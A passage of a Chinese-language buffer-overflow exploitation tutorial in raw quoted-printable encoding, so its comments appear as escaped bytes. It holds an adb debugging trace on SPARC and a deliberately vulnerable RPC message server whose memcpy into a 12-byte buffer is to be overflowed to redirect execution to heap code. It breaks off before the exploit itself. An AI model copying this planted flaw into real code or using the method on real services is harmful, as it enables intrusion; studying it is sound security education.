=
i0 ffbefdfe
o1 &nb=
sp;0 &nb=
sp; &nbs=
p; =20
=
i1 0
o2 0&nb=
sp; &nbs=
p; =
; =20
=
i2 0
o3 0&nb=
sp; &nbs=
p; =
; =20
=
i3 0
o4 0&nb=
sp; &nbs=
p; =
; =20
=
i4 0
o5 0&nb=
sp; &nbs=
p; =
; =20
=
i5 0
sp ffbe=
fb88 &nb=
sp; &nbs=
p; fp ffbefbf8
o7 &=
nbsp; 0 &=
nbsp; &n=
bsp; =20
=
i7 10758 =
=20
foo1+0x18
y 0
tstate:=20
4482001a06 (ccr=3D0x44, asi=3D0x82, =
pstate=3D0x1a,=20
cwp=3D0x6)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 =
cle:0=20
mg:0 ig:0
pc 106f4=20
=
foo2+4: =
=20
st %i0, [%fp +=20
0x44]
npc 106f8=20
=
foo2+8: =
=20
add %fp, -0x10,=20
=
%l0
/*
=CF=D6=D4=DA=B3=CC=D0=F2=D2=D1=BE=AD=BD=F8=C8=EBfoo2=BA=AF=CA=
=FD=A3=AC=B5=B1=C7=B0=BB=FA=C6=F7=D6=B8=C1=EE=B5=C4=B5=D8=D6=B7=CE=AApc=3D=
106f4=A3=AC=CE=D2=C3=C7=BF=B4=BF=B4=BD=F4=BD=D3=D7=C5=D5=E2=B8=F6=B5=D8=D6=
=B7=B5=C4=D6=B8=C1=EE=A3=BA
*/
.,8/i
foo2+8: &n=
bsp; =20
add %fp, -0x10,=20
=
%l0
=
or %i0, =
%g0,=20
=
%o1
=
mov =20
0x10, =
%o2
foo2+14=A3=BA =20
=
call 0x208b0 &n=
bsp; //call=20
=
strncpy
&n=
bsp; or %=
l0,=20
%g0,=20
=
%o0
=
sethi =20
%hi(0x20800),=20
=
%o0
=
or %o0, =
0x210, =
%o0
foo2+24=A3=BA =20
=
call 0x208bc &n=
bsp; //call=20
=
printf
/*
=D4=DAfoo2+14=CE=BB=D6=C3=B4=A6=CE=AA=BA=AF=CA=FD=B5=F7=D3=
=C3"call 0x208b0"=A3=AC=B4=D3=C9=CF=C3=E6dummy=B5=C4=
namelist=CE=D2=C3=C7=D6=AA=B5=C0=A3=AC=D5=E2=C0=EF=CA=C7=B5=F7=D3=C3=BA=AF=
=CA=FDstrncpy=A3=AC=B6=F8=CF=C2=C3=E6=B5=C4foo2+24=CE=BB=D6=C3=CF=D4=C8=BB=
=CE=AA=B5=F7=D3=C3=BA=AF=CA=FDprintf=A1=A3=D3=C9=D3=DAbuf=BB=BA=B3=E5=C7=F8=
=CA=C7strncpy=B5=C4=CA=E4=C8=EB=B2=CE=CA=FD=A3=AC=D4=DA=B3=CC=D0=F2=BD=F8=
=C8=EBstrncpy=BA=AF=CA=FD=BA=F3=A3=AC=CA=E4=C8=EB=BC=C4=B4=E6=C6=F7=C4=DA=
=D3=A6=B8=C3=BF=C9=D2=D4=D5=D2=B5=BDbuf=B5=C4=B5=D8=D6=B7=A3=AC=CB=F9=D2=D4=
=CE=D2=C3=C7=D4=DAstrncpy=B5=C4=C8=EB=BF=DA=C9=E8=D6=C3=D2=BB=B8=F6=B6=CF=
=B5=E3=C8=C3=B3=CC=D0=F2=D4=DA=C4=C7=C0=EF=D4=DD=CD=A3=A3=BA
*/
str=
ncpy:b
:c
breakpoint=20
=
at:
strncpy: save =
%sp,=20
-0x40, =
%sp
/*
=B3=CC=D0=F2=BD=D3=D7=C5=D4=CB=D0=D0=D6=B1=B5=BDstrncpy=B6=CF=
=B5=E3=A1=A3Single=20
Step=A3=BA
*/
:s
stopped=20
=
at:
strncpy+4: cmp =
; =20
%i2,=20
=
0x8
/*
=CE=D2=C3=C7=C0=B4=D1=D0=BE=BF=D2=BB=CF=C2=BA=AF=CA=FDstrncp=
y=B6=D4=D3=A6=B5=C4=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=A3=AC=CC=D8=B1=F0=CA=C7=
=CB=FC=B5=C4=CA=E4=C8=EB=BC=C4=B4=E6=C6=F7=A3=BA
*/
$r
g0 &=
nbsp; 0 &=
nbsp; &n=
bsp; =20
=
l0 0
g1 ff13=
3460 strncpy &n=
bsp; =20
=
l1 0
g2 0&nb=
sp; &nbs=
p; =
; =20
=
l2 0
g3 0&nb=
sp; &nbs=
p; =
; =20
=
l3 0
g4 0&nb=
sp; &nbs=
p; =
; =20
=
l4 0
g5 0&nb=
sp; &nbs=
p; =
; =20
=
l5 0
g6 0&nb=
sp; &nbs=
p; =
; =20
=
l6 0
g7 0&nb=
sp; &nbs=
p; =
; =20
=
l7 0
o0 0&nb=
sp; &nbs=
p; =
; =20
=
i0 ffbefbe8
o1 &nb=
sp;0 &nb=
sp; &nbs=
p; =20
=
i1 ffbefdfe
o2 &nb=
sp;0 &nb=
sp; &nbs=
p; =20
=
i2 10
o3 0&n=
bsp; &nb=
sp; &nbs=
p; =20
=
i3 0
o4 0&nb=
sp; &nbs=
p; =
; =20
=
i4 0
o5 0&nb=
sp; &nbs=
p; =
; =20
=
i5 0
sp ffbe=
fb48 &nb=
sp; &nbs=
p;fp ffbefb88
o7 &=
nbsp;0 &=
nbsp; &n=
bsp; =20
=
i7 10704 =
=20
foo2+0x14
y 0
tstate:=20
4482001a04 (ccr=3D0x44, asi=3D0x82, =
pstate=3D0x1a,=20
cwp=3D0x4)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 =
cle:0=20
mg:0 ig:0
pc ff133464=20
strncpy+4: =20
cmp %i2, 0x8
npc =
ff133468=20
strncpy+8: =20
=
bleu strncpy+0x650
/*
=CA=E4=C8=EB=BC=C4=B4=E6=
=C6=F7i0=B1=A3=B4=E6=D7=C5buf=B5=C4=C6=F0=CA=BC=B5=D8=D6=B70xfbefbe8=A3=AC=
=D5=E2=CA=C7strncpy=BF=BD=B1=B4=B5=C4=C4=BF=B1=EA=B5=D8=D6=B7=A3=AC=B6=F8=
=BC=C4=B4=E6=C6=F7i1=D6=D0=B1=A3=B4=E6=B5=C4ffbefdfe=CA=C7strncpy=BF=BD=B1=
=B4=B5=C4=D4=B4=B5=D8=D6=B7=A1=A3=D4=DA=BA=AF=CA=FDstrncpy=B5=F7=D3=C3=B7=
=B5=BB=D8=BA=F3=A3=ACbuf=D6=D0(=B4=D3=B5=D8=D6=B70xfbefbe8=BF=AA=CA=BC)=D3=
=A6=B8=C3=CC=EE=C2=FA=C1=CBASCII=C2=EB0X41414141=A1=A3=C4=C7=C3=B4=CE=D2=C3=
=C7=BE=CD=D4=DAstrncpy=B7=B5=BB=D8=BA=F3=B5=C4=B5=D8=D6=B7foo2+1c=C9=E8=D6=
=C3=D2=BB=B8=F6=B6=CF=B5=E3=A3=AC=C8=C3=B3=CC=D0=F2=D4=CB=D0=D0=B5=BD=C4=C7=
=C0=EF=D4=D9=CD=A3=CF=C2=C0=B4=A3=BA
*/
foo2+1c:b
:c
breakpoi=
nt=20
=
at:
foo2+0x1c: sethi =20
%hi(0x20800),=20
=
%o0
/*
=B3=CC=D0=F2=D2=D1=BE=AD=B4=D3strncpy=D6=D0=B7=B5=BB=D8=A3=AC=
=CE=D2=C3=C7=B0=D1=BB=BA=B3=E5=C7=F8buf=B8=BD=BD=FC=B5=C4=C4=DA=B4=E6=CF=D4=
=CA=BE=B3=F6=C0=B4=A3=AC=BE=CD=B4=D3=BA=AF=CA=FDstrncpy=B5=C4=B5=B1=C7=B0=
=B6=D1=D5=BB=BF=E9%sp=3Dffbefb48=BF=AA=CA=BC=A3=BA
*/
ffbefb48/=
24X
ffbefb48: =20
=
0 =
=20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; ffbefbe8 &=
nbsp; ffbefdfe 10&nbs=
p; =
; 0
&=
nbsp; 0 &=
nbsp; =20
=
0 =
=20
=
ffbefb88 10704
foo2=B5=C4=
=20
sp-> =20
=
ffbefbe8 0 &nbs=
p; =20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
0 =
=20
0
ffbefba8: =20
=
ffbefdfe 0 &nbs=
p; =20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
ffbefbf8 10758
&n=
bsp; &nb=
sp; 0 &nb=
sp; =20
=
0 =
=20
=
ffbefbf8 10750
&n=
bsp; &nb=
sp; 0 &nb=
sp; =20
=
0 =
=20
=
0 =
=20
0
buf=B5=C4=CE=BB=D6=C3-> =20
=
41414141 41414141 &nb=
sp; 0 &nb=
sp; =20
0
foo1=B5=C4 sp-> =20
=
20a30 =20
=
0 =
=20
=
0 =
=20
0
ffbefc08: =20
=
0 =
=20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; ffbefdfe &=
nbsp; 0 &=
nbsp; =20
=
ff1ba5e8 0
=
&=
nbsp; 21fb8 &nb=
sp;=20
=
ff11b8c4 ffbefc58 &nb=
sp; 10798
&=
nbsp; 0&=
nbsp; &n=
bsp; =20
=
ffbefdfe 0 &nbs=
p; =20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
0 =
=20
=
ff3e2660
&=
nbsp; ffbefd1c =
0 =
=20
=
ff1ba608 0
(=CF=C2=C3=
=E6=B5=C4=B3=CC=D0=F2=D4=CB=D0=D0=CA=A1=C2=D4......)
0xffbefbe=
8=C8=B7=CA=B5=CC=EE=C2=FA=C1=CB=D7=D6=B7=FB=B4=AE"AAAAAAAA"=B5=C4ascii=C2=
=EB0x41414141......=A1=A3=CB=F9=D2=D4=B4=D3=B5=D8=D6=B70xffbefbe8=B5=BD0x=
ffbefbf7=CA=C7=CF=B5=CD=B3=B7=D6=C5=E4=B8=F8buf=BB=BA=B3=E5=C7=F8=B5=C4=CE=
=BB=D6=C3=A1=A3=D4=D9=B6=D4=D5=D5=D2=BB=CF=C2foo1=BA=AF=CA=FD=D3=EBfoo2=BA=
=AF=CA=FD=B5=C4sp=BC=C4=B4=E6=C6=F7=D6=B8=D5=EB(=C7=EB=BF=B4=C9=CF=C3=E6=B5=
=C4=C4=DA=B4=E6=CF=D4=CA=BE)=CE=D2=C3=C7=BF=C9=D2=D4=D6=AA=B5=C0=A3=AC=D4=
=DA=C4=DA=B4=E6=D6=D0=D5=E2=B8=F6buf=B5=C4=B5=D8=D6=B7=CA=C7=B5=CD=D3=DAf=
oo1=B6=D1=D5=BB=BF=E9(=B4=D3=B5=D8=D6=B70xffbefbf8=BF=AA=CA=BC)=A3=AC=B6=F8=
=B8=DF=D3=DAfoo2=B6=D1=D5=BB=BF=E9(=B4=D3=B5=D8=D6=B70xffbefb88=BF=AA=CA=BC=
)=A1=A3
=BA=DC=CF=D4=C8=BB=A3=AC=D7=F7=CE=AAfoo2=B5=C4=BB=BA=B3=E5=
=C7=F8buf=A3=AC=C8=E7=B9=FB=B7=A2=C9=FA=D2=E7=B3=F6=B5=C4=BB=B0=A3=AC=CB=FC=
=D6=BB=BB=E1=B8=B2=B8=C7=B5=F4=B5=D8=D6=B7=B1=C8=CB=FC=B8=DF=B5=C4foo1=B6=
=D1=D5=BB=BF=E9=A3=BB=BB=BB=BE=E4=BB=B0=CB=B5=A3=AC=D4=DASparc=BB=FA=C6=F7=
=C9=CF=A3=AC=D7=D3=BA=AF=CA=FD(foo2)=BB=BA=B3=E5=C7=F8=D2=E7=B3=F6=BB=E1=B8=
=B2=B8=C7=B5=F7=D3=C3=CB=FC=B5=C4=C4=B8=BA=AF=CA=FD(foo1)=B5=C4=B6=D1=D5=BB=
=BF=E9=A1=A3=B5=B1=C4=B8=BA=AF=CA=FD(foo1)=B7=B5=BB=D8=B5=BDmain=BA=AF=CA=
=FD=CA=B1=A3=AC=CF=B5=CD=B3=B8=F9=BE=DD=C4=B8=BA=AF=CA=FD(foo1)=B6=D1=D5=BB=
=BF=E9=D6=D0=B5=DA0x3c-0x40=D7=D6=BD=DA=B5=C4=C4=DA=C8=DD=BC=C6=CB=E3foo1=
=B5=C4=B7=B5=BB=D8=B5=D8=D6=B7=A3=AC=C8=E7=B9=FB=D5=E2=B8=F6=B5=D8=D6=B7=B1=
=BB=B8=B2=B8=C7=B5=F4=A3=AC=B1=E4=B3=C9=D6=B8=CF=F2=BA=DA=BF=CD=C2=EB=A3=AC=
=C4=E3=B5=C4Exploit=BE=CD=B3=C9=B9=A6=C1=CB=A3=A1(=B5=B1=C8=BB=A3=AC=BC=C7=
=D7=A1=CE=D2=D4=DA=B1=BE=D5=C2=BF=AA=CA=BC=CB=B5=B5=C4=A3=AC=BA=DA=BF=CD=C2=
=EB=B2=BB=C4=DC=D4=DA=B6=D1=D5=BB=C7=F8=D6=B4=D0=D0=A3=AC=CE=D2=C3=C7=D2=AA=
=C8=C3=CB=FC=D4=DAHEAP=C7=F8=D6=D0=D4=CB=D0=D0=A1=A3)
=C8=E7=B9=FB=
=CD=AC=D1=F9=B5=C4=D2=E7=B3=F6=B7=A2=C9=FA=D4=DAIntel/X86=BC=C6=CB=E3=BB=FA=
=C9=CF=A3=ACfoo2=B5=C4=BB=BA=B3=E5=C7=F8buf=D2=E7=B3=F6=BB=E1=B8=B2=B8=C7=
foo2=B5=C4=B7=B5=BB=D8=B5=D8=D6=B7=A3=AC=BD=E1=B9=FB=CA=C7=B5=B1foo2=B7=B5=
=BB=D8=B5=BDfoo1=CA=B1=B3=CC=D0=F2=BE=CD=B1=BBExploit=A1=A3=C4=E3=C3=C7=BF=
=B4=B5=BD=C1=CB=A3=AC=D3=C9=D3=DASparc=D3=EBIntel=20
=
X86=BC=DC=B9=B9=C9=CF=B5=C4=C7=F8=B1=F0=A3=AC=B6=D4=CB=FC=C3=C7=B5=C4Expl=
oit=CA=C7=B2=BB=D2=BB=D1=F9=B5=C4=A1=A3
REMOTE PROCEDURE=20
=
CALL(RPC)=B1=B3=BE=B0=D6=AA=CA=B6=BD=E9=C9=DC=A3=BA
=B2=BB=D3=C3=
=B5=A3=D0=C4=A3=AC=D5=E2=C0=EF=CE=D2=D6=BB=D7=C5=D6=D8=BD=B2=D5=E2=D2=BB=D5=
=C2=D2=AA=D3=C3=B5=BD=B5=C4RPC=C2=A9=B6=B4=B3=CC=D0=F2=A3=AC=CE=D2=B2=A2=B2=
=BB=B4=F2=CB=E3=BF=AARPC=B5=C4=BF=CE=B3=CC----=B3=FD=B7=C7=C4=E3=C3=C7=D1=
=A7=D0=A3=BE=F6=B6=A8=C6=B8=C7=EB=CE=D2=D7=F7=BD=CC=CA=DA=A3=AC=B6=F8=C7=D2=
=B1=D8=D0=EB=CA=C7=D5=FD=BD=CC=CA=DA(Full=20
Professor=BB=F2Tenure=20
=
Professor)=A1=A3=D2=D4=C7=B0=CE=D2=D4=DA=D7=F7=D1=D0=BE=BF=C9=FA=B5=C4=CA=
=B1=BA=F2=A3=AC=CE=D2=CB=F9=D4=DA=B5=C4=D1=D0=BE=BF=D6=D0=D0=C4=D6=BB=D3=D0=
=C1=BD=B8=F6=D5=FD=BD=CC=CA=DA=A3=AC=B5=AB=D3=D0=D2=BB=B6=D1=B8=B1=BD=CC=CA=
=DA(Assistant Professor=BB=F2=20
Associate Professor)=A1=A3=D2=BB=B5=A9=CD=A8=B9=FDTenure=20
=
Track=D7=F6=C9=CF=D5=FD=BD=CC=CA=DA=A3=AC=BE=CD=B2=BB=D3=C3=B5=A3=D0=C4=B1=
=BB=BD=E2=B9=CD=A3=BB=B6=F8=B8=B1=BD=CC=CA=DA=CA=C7=BC=B8=C4=EA=D2=BB=C7=A9=
=BA=CF=CD=AC=A3=AC=C8=E7=B9=FB=D4=DA=BA=CF=CD=AC=C6=DA=BC=E4=C3=BB=D3=D0=D7=
=F7=B3=F6=CA=B2=C3=B4=B3=C9=B9=FB=A3=AC=BA=CF=CD=AC=B5=BD=C6=DA=BA=F3=BE=CD=
=BB=E1=BE=ED=C6=CC=B8=C7=D7=DF=C8=CB=A1=A3=CB=F9=D2=D4=CE=D2=BF=B4=B5=BD=B5=
=C4=B8=B1=BD=CC=CA=DA=B4=F3=B6=BC=CA=C7=BE=A4=BE=A4=D2=B5=D2=B5=A3=AC=C5=AC=
=C1=A6(=C5=AB=C1=A5)=B9=A4=D7=F7=A1=A3=B6=F8=D3=D0=B5=C4=D5=FD=BD=CC=CA=DA=
=B0=D1=BB=EE=BD=BB=B8=F8=CA=D6=CF=C2=B8=C9=A3=AC=D7=D4=BC=BA=B9=FD=D7=C5=D3=
=C6=D3=C6=D4=D5=D4=D5=B5=C4=D0=D2=B8=A3=C9=FA=BB=EE=A1=A3=B4=D3=C4=C7=CA=B1=
=C6=F0=A3=AC=CE=D2=BE=CD=CF=C2=B6=A8=BE=F6=D0=C4=A3=BA=D2=AA=C3=B4=D7=F7=D5=
=FD=BD=CC=CA=DA=A3=AC=D2=AA=C3=B4=B2=BB=D7=F7=A1=A3
=BD=E1=B9=FB=C4=
=E3=C3=C7=D2=B2=BF=B4=B5=BD=C1=CB=A3=AC=CE=D2=B7=B4=D5=FD=C3=BB=B5=B1=C9=CF=
=BD=CC=CA=DA=A1=A3=CB=F9=D2=D4=C4=D8=A3=AC=B9=D8=D3=DARPC=B5=C4=CF=EA=CF=B8=
=C4=DA=C8=DD=A3=AC=C7=EB=B4=F3=BC=D2=C8=A5=CE=CA=CE=CA=C4=E3=C3=C7=B5=C4=BD=
=CC=CA=DA=A3=AC=D5=E2=C0=EF=CE=D2=D6=BB=BD=B2=CE=D2=B5=C4RPC=C2=A9=B6=B4=B3=
=CC=D0=F2=A1=A3
=C7=EB=BF=B4=CF=C2=C3=E6=B5=C4RPC=BD=D3=BF=DA(Inte=
rface)=CE=C4=BC=FEmsg.x=A3=AC=CB=FC=B9=E6=B6=A8=C1=CBRPC=20
Server=BA=CDRPC =
Client=D6=AE=BC=E4=D4=B6=B3=CC=B5=F7=D3=C3(Invoke)=D3=EB=BD=E1=B9=FB=B7=B5=
=BB=D8=B5=C4=BD=D3=BF=DA=A1=A3=CE=D2=C3=C7=D4=DAmsg.x=D6=D0=B6=A8=D2=E5=C1=
=CB=D2=BB=B8=F6RPC=20
=
Procedure=BD=D0makemsg=A3=BA
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3Dmsg.x=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D><=
BR>
const=20
MAXLEN=3D2048;
typedef string =
svrmsg<MAXLEN>;
typedef char=20
len_val<MAXLEN>;
typedef len_val =
fromName;
typedef=20
len_val toName;
typedef len_val=20
MSG;
struct username_msg=20
{
fromName=20
fromname;
toName=20
toname;
MSG msg;
}=20
;
program MSGBOARD_PROG {
version =
MSGBOARD_VERSION {
svrmsg=20
makemsg(username_msg)=3D1;
} =3D 1;
} =3D =
=
200000089;
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D>
=
makemsg=D5=E2=B8=F6RPC=20
=
Procedure=D3=C9=CF=C2=C3=E6=B5=C4=B3=CC=D0=F2msg_proc.c=CA=B5=CF=D6=A3=AC=
=CB=FC=B5=C4=B9=A6=C4=DC=BA=DC=BC=F2=B5=A5=A3=AC=BE=CD=CA=C7=B0=D1RPC =
Client =
=B4=AB=C0=B4=B5=C4=D7=D6=B7=FB=B4=AE=C6=B4=B4=D5=D2=BB=CF=C2=D4=D9=B4=AB=BB=
=D8=B8=F8RPC=20
=
Client=A1=A3makemsg=D4=DA=D6=B4=D0=D0=D6=D0=B5=F7=D3=C3=C1=CB=C1=BD=B8=F6=
=D7=D3=BA=AF=CA=FDbackup=BA=CDinbackup=A1=A3=B4=F3=BC=D2=D7=D0=CF=B8=BF=B4=
=BF=B4inbackup=D6=D0=B5=C4memcpy=A3=AC=CB=FC=B0=D1=CA=E4=C8=EB=B5=C4=D7=D6=
=B7=FB=B4=AE=CD=EA=C8=AB=BF=BD=B1=B4=B5=BD=C7=F8=C7=F812=B8=F6=D7=D6=BD=DA=
=B5=C4=BB=BA=B3=E5=C7=F8tempDir=D6=D0=A3=AC=C8=E7=B9=FB=CA=E4=C8=EB=B5=C4=
=D7=D6=B7=FB=B4=AE=B3=A4=B6=C8=B3=AC=B9=FD12=B8=F6=D7=D6=BD=DA=A3=AC=BE=CD=
=BB=E1=B7=A2=C9=FA=BB=BA=B3=E5=C7=F8=D2=E7=B3=F6=A3=BB=B6=F8=C8=E7=B9=FB=D2=
=E7=B3=F6=B8=B2=B8=C7=C1=CBbackup=BA=AF=CA=FD=B6=D1=D5=BB=BF=E9=B5=C40x3c=
----0x40=D7=D6=BD=DA(=D2=B2=BE=CD=CA=C7=B5=F7=D3=C3backup=B5=C4=D6=B8=C1=EE=
=B5=D8=D6=B7)=A3=AC=CF=B5=CD=B3=BD=AB=BB=E1=B4=ED=CE=F3=BC=C6=CB=E3backup=
=B5=C4=B7=B5=BB=D8=B5=D8=D6=B7=A1=A3
=CD=AC=CA=B1=A3=ACmakemsg=B5=F7=
=D3=C3malloc=D4=DAHEAP=C7=F8=B2=FA=C9=FA=C1=CB=D2=BB=B8=F6=B6=AF=CC=AC=BB=
=BA=B3=E5=C7=F8backmsg=A3=AC=D5=E2=B8=F6backmsg=D6=B8=CF=F2=B5=C4=B6=AF=CC=
=AC=BB=BA=B3=E5=C7=F8=BD=AB=BB=E1=CA=C7=CE=D2=C3=C7=BA=DA=BF=CD=C2=EB=B5=C4=
=B8=F9=BE=DD=B5=D8=A1=A3=CE=D2=C3=C7Exploit=B5=C4=C4=BF=B1=EA=BE=CD=CA=C7=
=B0=D1backup=BA=AF=CA=FD=B5=C4=B7=B5=BB=D8=B5=D8=D6=B7=B8=C4=B1=E4=B3=C9=D6=
=B8=CF=F2=D5=E2=B8=F6=B6=AF=CC=AC=BB=BA=B3=E5=C7=F8=A3=AC=B4=D3=B6=F8=D6=B4=
=D0=D0=B8=F9=BE=DD=B5=D8=D6=D0=B5=C4=BA=DA=BF=CD=C2=EB=A1=A3
&=
lt;=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3Dmsg_proc.c=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D>
#include=20
"msg.h"
#include <errno.h>
#include=20
<sys/types.h>
#include =
<sys/socket.h>
#include=20
<netinet/in.h>
#include =
<rpc/rpc.h>
#include=20
<unistd.h>
int dynMemSize=3D6144;
extern int =
errno;
void backup(char*, int);
void inbackup(char*,=20
int);
svrmsg * makemsg_1(username_msg* un_msg, struct =
svc_req=20
*req)
{
static svrmsg=20
smsg;
char=20
*backmsg;
int =
fromInt, toInt,=20
msgInt; =20
if(smsg!=3DNULL)=20
=
free(smsg);
fromIn=
t=3Dun_msg->fromname.len_val_len;
toInt=3Du=
n_msg->toname.len_val_len;
msgInt=3Dun_msg-=
>msg.len_val_len;
backmsg=3Dmalloc(dynM=
emSize);
memset(backmsg,'\x00',=20
dynMemSize);
/*Client takes =
sometime=20
to transmit the=20
=
msg*/
sleep(5);
/*Can't=20
use strcpy cuz heap address contain=20
\x00*/
memcpy(backmsg,=20
un_msg->fromname.len_val_val,=20
=
fromInt);
memcpy((char*)backmsg+fromInt,=20
" said to ",=20
=
12);
memcpy((char*)backmsg+fromInt=
+12,=20
un_msg->toname.len_val_val,=20
=
toInt);
memcpy((char*)backmsg+fromInt+toInt+12=
,=20
"=3D=3D> ",=20
=
4);
memcpy((char*)backmsg+fromInt+=
toInt+16,=20
un_msg->msg.len_val_val,\=20
=
msgInt);
=
; /*Here=20
call the vulnerable=20
=
func*/
backup(un_msg->fromname.len_val_val,=
=20
=
fromInt);
smsg=3D&backmsg[0]; &nb=
sp;
return=20
(&smsg);
}
void backup(char* =
bkFromName, int=20
nmlen)
{
inbackup(bkFromName,=20
nmlen);
}
void inbackup(char *bkFromName, int=20
nmlen)
{
char=20
tempDir[12];
=
memcpy(tempDir,bkFromName,=20
=
nmlen);
}
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D&=
gt;
=CC=E1=D0=D1=B4=F3=BC=D2=D2=BB=BE=E4=A3=ACmakemsg=B2=A2=B2=
=BB=CA=C7RPC=20
=
Server=B3=CC=D0=F2=A3=AC=CB=FC=D6=BB=CA=C7=D2=BB=B8=F6RPC=B5=C4Procedure=B6=
=F8=D2=D1=20
=
=A3=AC=D5=E6=D5=FD=B5=C4Server=C6=F4=B6=AF=B3=CC=D0=F2=CA=C7=D3=C9RPC=B1=E0=
=D2=EB=C6=F7rpcgen=B2=FA=C9=FA=B5=C4=B3=CC=D0=F2msg_svc=A1=A3
=CF=C2=
=C3=E6=B5=C4rmsg.c=B8=F8=B3=F6=D2=BB=B8=F6=D5=FD=B3=A3RPC=20
=
Client=B5=C4=C0=FD=D7=D3=A3=AC=CB=FC=D2=AA=C7=F3=C4=E3=CA=E4=C8=EBRPC=20
=
Server=B5=C4=BB=FA=C6=F7=C3=FB=D2=D4=BC=B0=C1=ED=CD=E2=C8=FD=B8=F6=D7=D6=B7=
=FB=B4=AE=A3=BA
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3Drmsg.c=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D>
#=
include=20
<stdio.h>
#include "msg.h"
extern int=20
errno;
main(int argc, char=20
*argv[])
{
CLIENT=20
*clnt;
char=20
*server;
char=20
*from;
char=20
*to;
char=20
*message;
svrmsg=20
*result;
username_msg=20
req;
if (argc !=3D 5)=20
{
fprintf(stderr, =
"usage: %s=20
host from to message=20
\n",argv[0]);
=20
=
exit(1);
}
server=20
=3D argv[1];
from =3D=20
argv[2];
to =3D=20
argv[3];
message =3D=20
argv[4];
clnt =3D =
clnt_create(server,=20
MSGBOARD_PROG, MSGBOARD_VERSION,=20
"tcp");
if (clnt =3D=3D (CLIENT =
*)NULL)=20
{
=20
=
clnt_pcreateerror(server);
=20
=
exit(1);
}
req.=
fromname.len_val_len=20
=3D =
strlen(from);
req.fromname.len_val_val=20
=3D from;
req.toname.len_val_len =
=3D=20
=
strlen(to);
req.toname.len_val_val =3D=20
to;
req.msg.len_val_len =3D=20
=
strlen(message);
req.msg.len_val_val =3D=20
message;
/* printf ("fromname =
is =3D>=20
%s, len is =3D>%d\n", req.fromname.val,\=20
=
req.fromname.len);*/<=
BR> result=20
=3D makemsg_1(&req, =
clnt);
if=20
(result =3D=3D (svrmsg *)NULL) =
{
=20
clnt_perror(clnt, =
server);
=20
=
exit(1);
}
prin=
tf("%s\n",=20
=
*result);
xdr_free(xdr_svrmsg,=20
=
result);
exit(0);<=
BR>}
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D>
=CE=D2=C0=B4=D1=DD=CA=BE=D2=BB=CF=C2RPC=20
Server=D3=EBRPC =
Client=D6=AE=BC=E4=B5=C4=B5=F7=D3=C3=B9=FD=B3=CC=A1=A3=C7=EB=CF=C8=B8=F9=BE=
=DD=C4=E3=C3=C7=BD=CC=CA=DA=B5=C4=BD=B2=D2=E5=B0=D1=D5=E2=B8=F6=C0=FD=D7=D3=
=D6=D0=B5=C4RPC Server =BA=CDRPC=20
=
Client=CE=C4=BC=FE=B7=D6=B1=F0=B1=E0=D2=EB=BA=C3=A3=AC=C8=BB=BA=F3=CE=D2=C3=
=C7=D4=DAbeijing=C9=CF=D4=CB=D0=D0RPC=20
Server=B3=CC=D0=F2msg_svc=A3=BA
[moda@beijing]$ =
msg_svc
[moda@beijing]$=20
[moda@beijing]$ ps -ef | grep=20
=
msg //=D2=B2=BF=C9=D2=D4=D3=C3rpcinfo=BC=EC=B2=E9=A3=A1=A3=A1<=
BR>moda 7169 6142 0=20
11:38:42 pts/4 0:00 grep msg=20
moda 7167 =
1 0 11:38:40=20
? 0:00=20
msg_svc
[moda@beijing]$ =
=D4=DA=C1=ED=D2=BB=CC=A8=BB=FA=C6=F7hongkong=C9=CF=D4=CB=D0=D0RPC=
=20
Client=B3=CC=D0=F2rmsg=A3=AC
hongkong:/home/moda rmsg =
beijing dog cat hi=20
dog said to cat=3D=3D>=20
=
hi =
;
hongkong:/home/minchumo
=D5=E2=B8=F6=C0=FD=D7=D3=B5=C4RPC=B5=F7=
=D3=C3=BE=CD=CA=C7=D5=E2=C3=B4=BC=F2=B5=A5=A3=A1=A3=A1
adb=BC=E0=
=BF=D8=CF=C2=B5=C4=D4=B6=B3=CCEXPLOIT=A3=BA
=B5=BD=CF=D6=D4=DA=
=CE=AA=D6=B9=A3=AC=B4=F3=BC=D2=D2=D1=BE=AD=D6=AA=B5=C0=CE=D2=C3=C7=B5=C4R=
PC=20
Server=D3=EBRPC =
